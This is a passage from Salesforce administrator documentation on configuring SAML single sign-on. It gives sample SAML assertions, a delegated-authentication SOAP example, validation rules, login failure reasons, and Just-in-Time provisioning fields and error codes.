The start, error, login, and logout pages can be customized for single sign-on users using SAML 1.1 or 2.0. As part of your
configuration, you need to decide the following:

• The logout page: the URL to direct the user to when they click the Logout link in Salesforce. The default is
http://www.salesforce.com.

• If your identity provider uses SAML 1.1, the start page: the URL to direct the user to when sign-on successfully completes.
This URL can be absolute, such as https://na1.salesforce.com/001/o or it can be relative, such as /001/o. This
URL should be an endpoint that accepts SAML authentication requests.

In SAML 2.0, the start page is the page the user attempted to access before they were authenticated. The SAML 2.0 start
page must support Sp-init single sign-on.

If you are using SAML 2.0, you can also use the RelayState parameter to control where users get redirected after a
successful login.

• The single sign-on start page where Salesforce sends a SAML request to start the login sequence.

We recommend that if you specify a single sign-on start page that you also specify a logout page. When you specify a
logout page, when a user clicks logout or if a user’s session expires, the user is redirected to that page. If you don’t specify
a logout page, the user is redirected to the general Salesforce login page.

For SAML 2.0, these values can be set either during the single sign-on configuration, or by your identity provider in the login
URL or SAML assertion. The order of precedence is:

1. Session cookie—if you’ve already logged into Salesforce and a cookie still exists, the login and logout pages specified by
the session cookie are used.

2. Values passed in from the identity provider.
3. Values from the single sign-on configuration page.

If you decide not to add these values to the single sign-on configuration, share them with your identity provider. They will
need to use these values either in the login URL or the assertion.
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You can also decide if you want users to be directed to a custom error page if there’s an error during SAML login: It must be
a publicly accessible page, such as a public site Visualforce page. The URL can be absolute or relative. Use this value when
you configure SAML.

See Also:
About SAML

Example SAML Assertions

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Share the example SAML assertions with your identity provider so they can determine the format of the information Salesforce
requires for successful single-sign on.

In addition to the general single sign-on examples for both SAML 1.1 and SAML 2.0, use the following samples for the
specific feature:

• assertions for portals

• assertions for Sites

• SOAP message for delegated authentication

• assertion for just-in-time provisioning

SAML User ID type is the Salesforce username, and SAML User ID location is the <NameIdentifier> element
in the <Subject> element

SAML 1.1:

<Subject>
<NameIdentifier>user101@salesforce.com</NameIdentifier>

</Subject>

SAML 2.0:

<saml:Subject>
<saml:NameID
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Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">user101@salesforce.com</saml:NameID>

<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2008-06-26T02:44:24.173Z"

Recipient="http://localhost:9000"/>
</saml:SubjectConfirmation>

</saml:Subject>

SAML User ID type is the Salesforce username, and SAML User ID location is the <Attribute> element

SAML 1.1:

<AttributeStatement>
<Subject>
<NameIdentifier>this value doesn't matter</NameIdentifier>

<SubjectConfirmation>
<ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</ConfirmationMethod>

</SubjectConfirmation>
</Subject>

<Attribute AttributeName="MySfdcName" AttributeNamespace="MySfdcURI">
<AttributeValue>user101@salesforce.com</AttributeValue>

</Attribute>
</AttributeStatement>

SAML 2.0:

<saml:AttributeStatement>
<saml:Attribute FriendlyName="fooAttrib" Name="SFDC_USERNAME"

NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">
user101@salesforce.com

</saml:AttributeValue>
</saml:Attribute>

</saml:AttributeStatement>

SAML User ID type is the Salesforce User object's FederationIdentifier field, and SAML User ID location is
the <NameIdentifier> element in the <Subject> element

SAML 1.1:

<AttributeStatement>
<saml:Subject>

<saml:NameIdentifier Format="urn:oasis:names:tc:SAML:1.0:assertion"
NameQualifier="www.saml_assertions.com">

MyName
</saml:NameIdentifier>

</saml:Subject>
</AttributeStatement>

SAML 2.0:

<saml:Subject>
<saml:NameID

Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">MyName</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">

<saml:SubjectConfirmationData NotOnOrAfter="2008-06-26T02:48:25.730Z"
Recipient="http://localhost:9000/"/>
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</saml:SubjectConfirmation>
</saml:Subject>

Note:  The name identifier can be any arbitrary string, including email addresses or numeric ID strings.

SAML User ID type is theSalesforce User object's FederationIdentifier field, and SAML User ID location is
the <Attribute> element

SAML 1.1:

<AttributeStatement>
<Subject>
<NameIdentifier>who cares</NameIdentifier>

<SubjectConfirmation>
<ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</ConfirmationMethod>

</SubjectConfirmation>
</Subject>

<Attribute AttributeName="MyName" AttributeNamespace="MyURI">
<AttributeValue>user101</AttributeValue>

</Attribute>
</AttributeStatement>

SAML 2.0:

<saml:AttributeStatement>
<saml:Attribute FriendlyName="fooAttrib" Name="SFDC_ATTR"

NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">
user101

</saml:AttributeValue>
</saml:Attribute>

</saml:AttributeStatement>

SAML User ID type is the Salesforce username, and SAML User ID location is the <NameIdentifier> element
in the <Subject> element

The following is a complete SAML response, for SAML 2.0:

<samlp:Response ID="_257f9d9e9fa14962c0803903a6ccad931245264310738"
IssueInstant="2009-06-17T18:45:10.738Z" Version="2.0">

<saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">
https://www.salesforce.com</saml:Issuer>

<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>

</samlp:Status>

<saml:Assertion ID="_3c39bc0fe7b13769cab2f6f45eba801b1245264310738"
IssueInstant="2009-06-17T18:45:10.738Z" Version="2.0">
<saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">

https://www.salesforce.com</saml:Issuer>

<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">

saml01@salesforce.com</saml:NameID>
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<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2009-06-17T18:50:10.738Z"

Recipient="https://login.www.salesforce.com"/>
</saml:SubjectConfirmation>

</saml:Subject>

<saml:Conditions NotBefore="2009-06-17T18:45:10.738Z"
NotOnOrAfter="2009-06-17T18:50:10.738Z">

<saml:AudienceRestriction>
<saml:Audience>https://saml.salesforce.com</saml:Audience>

</saml:AudienceRestriction>
</saml:Conditions>

<saml:AuthnStatement AuthnInstant="2009-06-17T18:45:10.738Z">

<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified
</saml:AuthnContextClassRef>

</saml:AuthnContext>
</saml:AuthnStatement>

<saml:AttributeStatement>

<saml:Attribute Name="portal_id">
<saml:AttributeValue xsi:type="xs:anyType">060D00000000SHZ
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="organization_id">
<saml:AttributeValue xsi:type="xs:anyType">00DD0000000F7L5
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="ssostartpage"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">

<saml:AttributeValue xsi:type="xs:anyType">
http://www.salesforce.com/security/saml/saml20-gen.jsp

</saml:AttributeValue>
</saml:Attribute>

<saml:Attribute Name="logouturl"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">

<saml:AttributeValue xsi:type="xs:string">
http://www.salesforce.com/security/del_auth/SsoLogoutPage.html

</saml:AttributeValue>
</saml:Attribute>

</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response>

Sample SAML Assertions for Portals

The following shows the portal_id and organization_id attributes in a SAML assertion statement:

<saml:AttributeStatement>
<saml:Attribute Name="portal_id">

<saml:AttributeValue xsi:type="xs:anyType">060D00000000SHZ</saml:AttributeValue>
</saml:Attribute>

<saml:Attribute Name="organization_id">
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<saml:AttributeValue xsi:type="xs:anyType">00DD0000000F7P5</saml:AttributeValue>
</saml:Attribute>

</saml:AttributeStatement>

The following is a complete SAML assertion statement that can be used for single sign-on for portals. The organization is
using federated sign-on, which is included in an attribute, not in the subject.

<samlp:Response ID="_f97faa927f54ab2c1fef230eee27cba21245264205456"
IssueInstant="2009-06-17T18:43:25.456Z" Version="2.0">

<saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">
https://www.salesforce.com</saml:Issuer>

<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>

</samlp:Status>

<saml:Assertion ID="_f690da2480a8df7fcc1cbee5dc67dbbb1245264205456"
IssueInstant="2009-06-17T18:43:25.456Z" Version="2.0">
<saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">

https://www.salesforce.com</saml:Issuer>

<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">null
</saml:NameID>

−
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2009-06-17T18:48:25.456Z"

Recipient="https://www.salesforce.com/?saml=02HKiPoin4f49GRMsOdFmhTgi
_0nR7BBAflopdnD3gtixujECWpxr9klAw"/>
</saml:SubjectConfirmation>

</saml:Subject>

<saml:Conditions NotBefore="2009-06-17T18:43:25.456Z"
NotOnOrAfter="2009-06-17T18:48:25.456Z">

<saml:AudienceRestriction>
<saml:Audience>https://saml.salesforce.com</saml:Audience>

</saml:AudienceRestriction>
</saml:Conditions>

<saml:AuthnStatement AuthnInstant="2009-06-17T18:43:25.456Z">

<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified
</saml:AuthnContextClassRef>

</saml:AuthnContext>
</saml:AuthnStatement>

<saml:AttributeStatement>

<saml:Attribute FriendlyName="Friendly Name" Name="federationId"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:string">saml_portal_user_federation_id
</saml:AttributeValue>
<saml:AttributeValue xsi:type="xs:string">SomeOtherValue
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="portal_id">
<saml:AttributeValue xsi:type="xs:anyType">060D00000000SHZ
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="organization_id">
<saml:AttributeValue xsi:type="xs:anyType">00DD0000000F7Z5
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</saml:AttributeValue>
</saml:Attribute>

<saml:Attribute Name="ssostartpage"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">

<saml:AttributeValue xsi:type="xs:anyType">
http://www.salesforce.com/qa/security/saml/saml20-gen.jsp

</saml:AttributeValue>
</saml:Attribute>

<saml:Attribute Name="logouturl"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">

<saml:AttributeValue xsi:type="xs:string">
http://www.salesforce.com/qa/security/del_auth/SsoLogoutPage.html

</saml:AttributeValue>
</saml:Attribute>

</saml:AttributeStatement>
</saml:Assertion>

</samlp:Response>

Sample SAML Assertion for Sites

The following shows the portal_id, organization_id, and siteurl attributes in a SAML assertion statement:

<saml:AttributeStatement>
<saml:Attribute Name="portal_id">

<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="xs:anyType">060900000004cDk

</saml:AttributeValue>
</saml:Attribute>

<saml:Attribute Name="organization_id">
<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="xs:anyType">00D900000008bX0

</saml:AttributeValue></saml:Attribute>
<saml:Attribute Name="siteurl">

<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="xs:anyType">https://ap1.force.com/mySuffix</saml:AttributeValue>

</saml:Attribute>

Sample SOAP Message for Delegated Authentication

As part of the delegated authentication single sign-on process, a salesforce.com server makes a SOAP 1.1 request to authenticate
the user who is passing in the credentials. Here is an example of this type of request. Your single sign-on Web service needs
to accept this request, process it, and return a true or false response.

Sample Request

<?xml version="1.0" encoding="UTF-8" ?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<Authenticate xmlns="urn:authentication.soap.sforce.com">
<username>sampleuser@sample.org</username>
<password>myPassword99</password>
<sourceIp>1.2.3.4</sourceIp>

</Authenticate>
</soapenv:Body>

</soapenv:Envelope>
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Sample Response Message

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<AuthenticateResult

xmlns="urn:authentication.soap.sforce.com">
<Authenticated>false</Authenticated>
</AuthenticateResult>
</soapenv:Body>
</soapenv:Envelope>

Sample SAML Assertion for Just-In-Time Provisioning

The following is a sample SAML assertion for just in time provisioning.

<saml:Attribute Name="User.Username"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">testuser@123.org
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.Phone"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">415-123-1234
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.FirstName"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">Testuser
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.LanguageLocaleKey"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">en_US
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.CompanyName"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">Salesforce.com
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.Alias"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">tlee2
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.CommunityNickname"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">tlee2
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.UserRoleId"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">000000000000000
</saml:AttributeValue>

</saml:Attribute>
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<saml:Attribute Name="User.Title"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">Mr.
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.LocaleSidKey"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">en_CA
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.Email"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">testuser@salesforce.com
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name=" User.FederationIdentifier"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">tlee2
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.TimeZoneSidKey"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">America/Los_Angeles
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.LastName"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">Lee
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.ProfileId"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">00ex0000001pBNL
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.IsActive"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">1
</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="User.EmailEncodingKey"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">UTF-8
</saml:AttributeValue>

</saml:Attribute>

</saml:AttributeStatement>

See Also:
About SAML

611

About SAMLSecurity



Reviewing the SAML Login History

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

When a user logs in to Salesforce from another application using single sign-on, SAML assertions are sent to the Salesforce
login page. The assertions are checked against assertions in the authentication certificate specified under Setup, in Security
Controls > Single Sign-On Settings. If a user fails to log in, a message is written to the login history log that indicates why
the login failed. In addition, the SAML Assertion Validator may be automatically populated with the invalid assertion.

To view the login history, from Setup, click Users > Login History. After viewing the login history, you may want to share
the information with your identity provider.

The following are the possible failures:

Assertion Expired

An assertion’s timestamp is more than five minutes old.

Note: Salesforce does make an allowance of three minutes for clock skew. This means, in practice, that an
assertion can be as much as eight minutes after the timestamp time, or three minutes before it. This amount of
time may be less if the assertion’s validity period is less than five minutes.

Assertion Invalid

An assertion is not valid. For example, the <Subject> element of an assertion might be missing.

Audience Invalid

The value specified in <Audience> must be https://saml.salesforce.com.

Configuration Error/Perm Disabled

Something is wrong with the SAML configuration in Salesforce. For example, the uploaded certificate might be corrupted,
or the organization preference might have been turned off. Check your configuration from Setup, in Security Controls
> Single Sign-On Settings, get a sample SAML assertion from your identity provider, and click SAML Assertion
Validator.

Issuer Mismatched

The issuer or entity ID specified in an assertion does not match the issuer specified in your Salesforce configuration.
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Recipient Mismatched

The recipient specified in an assertion does not match the recipient specified in your Salesforce configuration.

Replay Detected

The same assertion ID was used more than once. Assertion IDs must be unique within an organization.

Signature Invalid

The signature in an assertion cannot be validated by the certificate in your Salesforce configuration.

Subject Confirmation Error

The <Subject> specified in the assertion does not match the SAML configuration in Salesforce.

See Also:
About SAML

Validating SAML Settings for Single Sign-On

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

If your users have difficulty logging into Salesforce after you configure Salesforce for single sign-on, use the SAML Assertion
Validator and the login history to validate the SAML assertions sent by your identity provider.

1. Obtain a SAML assertion from your identity provider. The assertion can be either in plain XML format or base64 encoded.

If a user tries to log in to Salesforce and fails, the invalid SAML assertion is used to automatically populate the SAML
Assertion Validator if possible.

2. From Setup, click Security Controls > Single Sign-On Settings, then click SAML Assertion Validator.
3. Enter the SAML assertion into the text box, and click Validate.
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4. Share the results of the validation errors with your identity provider.

See Also:
About SAML
About Single Sign-On
Best Practices for Implementing Single Sign-On
Administrator setup guide: Single Sign-On Implementation Guide

SAML Assertion Validation Errors

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Salesforce imposes the following validity requirements on assertions:

Authentication Statement

The identity provider must include an <AuthenticationStatement> in the assertion.

Conditions Statement

If the assertion contains a <Conditions> statement, it must contain a valid timestamp.

Timestamps

The validity period specified in an assertion is honored. In addition, an assertion's timestamp must be less than five
minutes old, plus or minus three minutes, regardless of the assertion's validity period setting. This allows for differences
between machines. The NotBefore and NotOnOrAfter constraints must also be defined and valid.

Attribute

If your Salesforce configuration is set to Identity is in an Attribute element, the assertion from the identity
provider must contain an <AttributeStatement>.

If you are using SAML 1.1, both <AttributeName> and <AttributeNamespace> are required as part of the
<AttributeStatement>.

If you are using SAML 2.0, only <AttributeName> is required.
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Format

The Format attribute of an <Issuer> statement must be set to
"urn:oasis:names:tc:SAML:2.0:nameid-format:entity" or not set at all.

For example:

<saml:Issuer
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://www.salesforce.com</saml:Issuer>

The following example is also valid:

<saml:Issuer >https://www.salesforce.com</saml:Issuer>

Issuer

The issuer specified in an assertion must match the issuer specified in Salesforce.

Subject

The subject of the assertion must be resolved to be either the Salesforce username or the Federation ID of the user.

Audience

The <Audience> value is required and must match the Entity ID from the single sign-on configuration. The default
value is https://saml.salesforce.com.

Recipient

The recipient specified in an assertion must match either the Salesforce login URL specified in the Salesforce configuration
or the OAuth 2.0 token endpoint. This is a required portion of the assertion and is always verified.

Signature

A valid signature must be included in the assertion. The signature must be created using the private key associated with
the certificate that was provided in the SAML configuration.

Recipient

Verifies that the recipient and organization ID received in the assertion matches the expected recipient and organization
ID, as specified in the single sign-on configuration. This is an optional portion of the assertion and is only verified if it’s
present. For example:

Recipient that we found in the assertion: http://aalbert-salesforce.com:8081/
?saml=02HKiPoin4zeKLPYxfj3twkPsNSJF3fxsH0Jnq4vVeQr3xNkIWmZC_IVk3

Recipient that we expected based on the Single Sign-On Settings page:
http://asmith.salesforce.com:8081/
?saml=EK03Almz90Cik_ig0L97.0BRme6mT4o6nzi0t_JROL6HLbdR1WVP5aQO5w

Organization Id that we expected: 00Dx0000000BQlI
Organization Id that we found based on your assertion: 00D000000000062

Site URL Attribute

Verifies if a valid Sites URL is provided. Values are:
• Not Provided

• Checked

• Site URL is invalid
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• HTTPS is required for Site URL

• The specified Site is inactive or has exceeded its page limit

See Also:
About SAML

About Just-in-Time Provisioning for SAML
Available in: All Editions

With Just-in-Time provisioning, you can use a SAML assertion to create regular and portal users on the fly the first time they
try to log in. This eliminates the need to create user accounts in advance. For example, if you recently added an employee to
your organization, you don't need to manually create the user in Salesforce. When they log in with single sign-on, their account
is automatically created for them, eliminating the time and effort with on-boarding the account. Just-in-Time provisioning
works with your SAML identity provider to pass the correct user information to Salesforce in a SAML 2.0 assertion. You can
both create and modify accounts this way. Because Just-in-Time provisioning uses SAML to communicate, your organization
must have SAML-based single sign-on enabled.

Benefits of Just-in-Time Provisioning

Implementing Just-in-Time provisioning can offer the following advantages to your organization.

• Reduced Administrative Costs: Provisioning over SAML allows customers to create accounts on-demand, as part of the
single sign-on process. This greatly simplifies the integration work required in scenarios where users need to be dynamically
provisioned, by combining the provisioning and single sign-on processes into a single message.

• Increased User Adoption: Users only need to memorize a single password to access both their main site and Salesforce.
Users are more likely to use your Salesforce application on a regular basis.

• Increased Security: Any password policies that you have established for your corporate network are also in effect for
Salesforce. In addition, sending an authentication credential that is only valid for a single use can increase security for users
who have access to sensitive data.

See Also:
Just-in-Time Provisioning Requirements
Just-in-Time Provisioning Errors
Example SAML Assertions
About Single Sign-On

Just-in-Time Provisioning Requirements
Just-in-Time provisioning requires the creation of a SAML assertion. Consider the following when creating your SAML
assertion.

616

About Just-in-Time Provisioning for SAMLConnection Security



• Provision Version is supported as an optional attribute. If it isn't specified, the default is 1.0. For example:

<saml:Attribute Name="ProvisionVersion" NameFormat=
"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">

<saml:AttributeValue xsi:type="xs:anyType">1.0</saml:AttributeValue>
</saml:Attribute>

• ProfileIDs change per organization, even for standard profiles. To make it easier to find the profile name, Salesforce allows
you to do a profile name lookup by passing the ProfileName into the ProfileId field.

Field Requirements for the SAML Assertion

To correctly identify which object to create in Salesforce, you must use the User. prefix for all fields passed in the SAML
assertion. In this example, the User. prefix has been added to the Username field name.

<saml:Attribute
Name="User.Username"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">

<saml:AttributeValue xsi:type="xs:anyType">testuser@123.org</saml:AttributeValue>
</saml:Attribute>

The following standard fields are supported.

CommentsRequiredFields

AboutMe

If not present, a default is derived from FirstName and LastName.Alias

CallCenter

City

If not present, a default is derived from the UserName.CommunityNickname

CompanyName

Country

Derived from organization settings.DefaultCurrencyIsoCode

DelegatedApproverId

Department

Division

YEmail

If not present, a default is derived from the organization settings.EmailEncodingKey

EmployeeNumber

Extension

Fax

If present, it must match the SAML subject, or the SAML subject is
taken instead. Can't be updated with SAML.

FederationIdentifier (insert
only)

FirstName
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CommentsRequiredFields

ForecastEnabled

IsActive

YLastName

LanguageLocaleKey

If not present, a default is derived from the organization settings.LocaleSidKey

Manager

MobilePhone

Phone

YProfileId

ReceivesAdminInfoEmails

ReceivesInfoEmails

State

Street

If not present, a default is derived from the organization settings.TimeZoneSidKey

Title

Can't update using SAML.YUsername (insert only)

Defaults to “no role” if blank.UserRoleId

Zip

Other field requirements:

• Only text type custom fields are supported.
• Only the insert and update functions are supported for custom fields.
• When using the API for user creation, you can pass the new username into the User.Username field. You can also specify

the User.FederationIdentifier if it is present. However, the Username and FederationIdentifier fields
can't be updated with API.

See Also:
About Just-in-Time Provisioning for SAML

Just-in-Time Provisioning for Portals
With Just-in-Time (JIT) provisioning for portals, you can use a SAML assertion to create customer and partner portal users
on the fly the first time they try to log in. This eliminates the need to create user accounts in advance. Because JIT uses SAML
to communicate, your organization must have SAML-based single sign-on enabled.
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Creating Portal Users

The Portal ID and Organization ID must be specified as part of the SAML assertion. You can find both of these on
the company information page for the organization or portal. Because you can also provision regular users, the Portal ID
is used to distinguish between a regular and portal JIT provisioning request. If no Portal ID is specified, then the request
is treated as a JIT request for regular platform user. Here are the requirements for a creating a portal user.

• You must specify a Federation ID. If the ID belongs to an existing user account, the user account is updated. In case
of an inactive user account, the user account is updated, but left inactive unless User.IsActive in the JIT assertion is
set to true. If there is no user account with that Federation ID, the system creates a new user.

• You must pass a valid Account ID and Contact ID.
• If the portal isn’t self-registration enabled and a default new user profile and role aren’t specified, the User.ProfileId

field must contain a valid profile name or ID associated with the portal. In addition, the User.PortalRole field must
contain a valid portal role name or ID.

Note:  The User.Role must be null.

Creating and Modifying Accounts

Create or modify an account by specifying a valid Account ID or both the Account.AccountNumber and Account.Name.

• Matching is based on Account.AccountNumber. If multiple accounts are found, an error is displayed. Otherwise, the
account is updated.

• If no matching account is found, one is created.
• You must specify the Account.Owner in the SAML assertion and ensure that the field level security for the

Account.AccountNumber field is set to visible for this owner’s profile.

Creating and Modifying Contacts

Create or modify a contact by specifying the a valid Contact ID in User.Contact or both the Contact.Email and
Contact.LastName.

• Matching is based on Contact.Email. If multiple contacts are found, an error is displayed. Otherwise, the contact is
updated.

• If no matching contact is found, one is created.

Supported Fields for the Portal SAML Assertion

To correctly identify which object to create in Salesforce, you must use a prefix. In the SAML assertion, use the Account.
prefix for all fields in the Account schema and Contact. prefix for all fields in the Contact schema. In this example, the
Contact. prefix has been added to the Email field name.

<saml:Attribute
Name="Contact.Email"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">

<saml:AttributeValue xsi:type="xs:anyType">testuser@123.org</saml:AttributeValue>
</saml:Attribute>

In addition to the standard fields supported for regular SAML JIT users, these fields are supported for accounts.

CommentsRequiredFields

Street|City|State|PostalCode|CountryBilling
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CommentsRequiredFields

AnnualRevenue

Description

Fax

If present, it must match the SAML subject or the SAML subject is
taken instead. Can’t be updated using SAML.

YFederationIdentifier (insert
only)

IsCustomerPortal

IsPartner

NumberOfEmployees

Ownership

Phone

YPortal Role

Rating

Street

TickerSymbol

Defaults to “no role” if blank.UserRoleId

Website

Zip

In addition to the standard fields supported for regular SAML JIT users, these fields are supported for contacts.

CommentsRequiredFields

Birthdate

Name|PhoneCanAllowPortalSelfReg

Department

Description

DoNotCall

Fax

If present, it must match the SAML subject or the SAML subject is
taken instead. Can’t be updated using SAML.

YFederationIdentifier (insert
only)

HasOptedOutofEmail

HasOptedOutofFax

HomePhone

LeadSource

Street|City|State|PostalCode|CountryMailing
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CommentsRequiredFields

MobilePhone

Owner

Street|City|State|PostalCode|CountryOther

OtherPhone

Phone

Salutation

Title

See Also:
About Just-in-Time Provisioning for SAML
Just-in-Time Provisioning Requirements

Just-in-Time Provisioning Errors
This table shows the error codes for Just-in-Time provisioning for SAML. Errors are returned in the URL parameter, for
example:

http://login.salesforce.com/identity/jit/saml-error.jsp?
ErrorCode=5&ErrorDescription=Unable+to+create+user&ErrorDetails=
INVALID_OR_NULL_FOR_RESTRICTED_PICKLIST+TimeZoneSidKey

Note:

Salesforce redirects the user to a custom error URL if one is specified in your SAML configuration.

Error Messages

Error DetailsDescriptionCode

MISSING_FEDERATION_IDMissing Federation Identifier1

MISMATCH_FEDERATION_IDMis-matched Federation Identifier2

INVALID_ORG_IDInvalid organization ID3

USER_CREATION_FAILED_ON_UROGUnable to acquire lock4

USER_CREATION_API_ERRORUnable to create user5

ADMIN_CONTEXT_NOT_ESTABLISHEDUnable to establish admin context6

UNRECOGNIZED_CUSTOM_FIELDUnrecognized custom field8

UNRECOGNIZED_STANDARD_FIELDUnrecognized standard field9

LICENSE_LIMIT_EXCEEDEDLicense limit exceeded11
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Error DetailsDescriptionCode

